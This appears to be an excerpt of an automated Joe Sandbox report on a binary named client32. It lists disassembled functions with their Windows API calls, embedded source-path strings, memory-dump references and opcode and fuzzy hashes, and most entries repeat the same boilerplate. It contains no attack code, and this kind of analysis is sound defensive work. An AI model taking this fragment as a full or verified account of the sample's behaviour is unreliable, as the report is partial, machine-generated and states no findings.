                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                                                                                • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                                                                                                • API String ID: 1528188558-323366856
                                                                                                                                                                                • Opcode ID: 7b7f4f1f93522c1cafdf6d0149208f9d4d2112cbab8669a1491d08897b464a85
                                                                                                                                                                                • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b7f4f1f93522c1cafdf6d0149208f9d4d2112cbab8669a1491d08897b464a85
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                                                                                                                                Function 110896B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,0000000E), ref: 11160E88
                                                                                                                                                                                  • Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 11160D4F
                                                                                                                                                                                  • Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11160D90
                                                                                                                                                                                  • Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
                                                                                                                                                                                  • Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1
                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 11160E4A
                                                                                                                                                                                • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 11160E60
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                                                                                                                • String ID: hhctrl.ocx
                                                                                                                                                                                • API String ID: 1060647816-2298675154
                                                                                                                                                                                • Opcode ID: 5ff69cf7bd6d5e4bebdb820f54eb11012673f38428693a78d7ddbb2f2a09254c
                                                                                                                                                                                • Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ff69cf7bd6d5e4bebdb820f54eb11012673f38428693a78d7ddbb2f2a09254c
                                                                                                                                                                                • Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50
                                                                                                                                                                                Function 11005940 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 11005981
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110059BC
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 3704029381-2830328467
                                                                                                                                                                                • Opcode ID: a0f775d5f105485d8c7acfdebeeec3c2d27f82d63063805c127c39455c9d02c9
                                                                                                                                                                                • Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
                                                                                                                                                                                • Opcode Fuzzy Hash: a0f775d5f105485d8c7acfdebeeec3c2d27f82d63063805c127c39455c9d02c9
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1
                                                                                                                                                                                Function 1105D500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,2520CF5D), ref: 1105D59E
                                                                                                                                                                                • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,2520CF5D), ref: 1105D5A8
                                                                                                                                                                                Strings
                                                                                                                                                                                • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                                                                                                                                • API String ID: 3094578987-11999416
                                                                                                                                                                                • Opcode ID: c26f52e121161864dfc5d8d11b5b09964da4d59dea70b0d985f4867f346bd749
                                                                                                                                                                                • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                                                                                                                                • Opcode Fuzzy Hash: c26f52e121161864dfc5d8d11b5b09964da4d59dea70b0d985f4867f346bd749
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                                                                                                                                Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _memmove.LIBCMT ref: 111535AC
                                                                                                                                                                                • _memmove.LIBCMT ref: 111535E6
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                                                                                                                • API String ID: 6605023-1396654219
                                                                                                                                                                                • Opcode ID: 99c6d8c866beefa16b148e21378ad03898355490845909b11877c39877564702
                                                                                                                                                                                • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                                                                                                                                • Opcode Fuzzy Hash: 99c6d8c866beefa16b148e21378ad03898355490845909b11877c39877564702
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                                                                                                                                Function 111456D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strtok
                                                                                                                                                                                • String ID: ,;$..\ctl32\util.cpp
                                                                                                                                                                                • API String ID: 1675499619-1361470564
                                                                                                                                                                                • Opcode ID: 618d144ef345ab12500a21190d1c6f2884217e34ab2361f85c8e56ade1b2c516
                                                                                                                                                                                • Instruction ID: 80f63f6420d1218ac57f42b5bfc0d1861d7651ed5a30d2c510a11a98892656b0
                                                                                                                                                                                • Opcode Fuzzy Hash: 618d144ef345ab12500a21190d1c6f2884217e34ab2361f85c8e56ade1b2c516
                                                                                                                                                                                • Instruction Fuzzy Hash: 810178BBB0861267D7014A7E6D45B9EF79CDB816ACF940031FD4CC7702FA61E81582A6
                                                                                                                                                                                Function 110395A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                • API String ID: 1136984157-1986719024
                                                                                                                                                                                • Opcode ID: 96880ffc72d8e9f9517aed2dfc38d9f25e991ec24fd5eaadf1b3bb92c31d1550
                                                                                                                                                                                • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                                                                                                                                • Opcode Fuzzy Hash: 96880ffc72d8e9f9517aed2dfc38d9f25e991ec24fd5eaadf1b3bb92c31d1550
                                                                                                                                                                                • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                                                                                                                                Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                                                                                                • API String ID: 819365019-2727927828
                                                                                                                                                                                • Opcode ID: 7645876e0fae9efbf934685df45fdaea240a216c57b53f77874a6ba7b6021e25
                                                                                                                                                                                • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                                                                                                                • Opcode Fuzzy Hash: 7645876e0fae9efbf934685df45fdaea240a216c57b53f77874a6ba7b6021e25
                                                                                                                                                                                • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                                                                                                                Function 110ED470 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsWindow.USER32(?), ref: 110ED498
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                                                                                                                • API String ID: 2577986331-1331251348
                                                                                                                                                                                • Opcode ID: 0d55b59c8e0eb5ea10d93b1ed4bb074612e75878819cd8153b42dbada291bc11
                                                                                                                                                                                • Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d55b59c8e0eb5ea10d93b1ed4bb074612e75878819cd8153b42dbada291bc11
                                                                                                                                                                                • Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
                                                                                                                                                                                Function 1103F4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
                                                                                                                                                                                  • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                                                                                                                  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
                                                                                                                                                                                  • Part of subcall function 1103F450: Sleep.KERNEL32(00000014,?,110505AF,00000001,00000064), ref: 1103F497
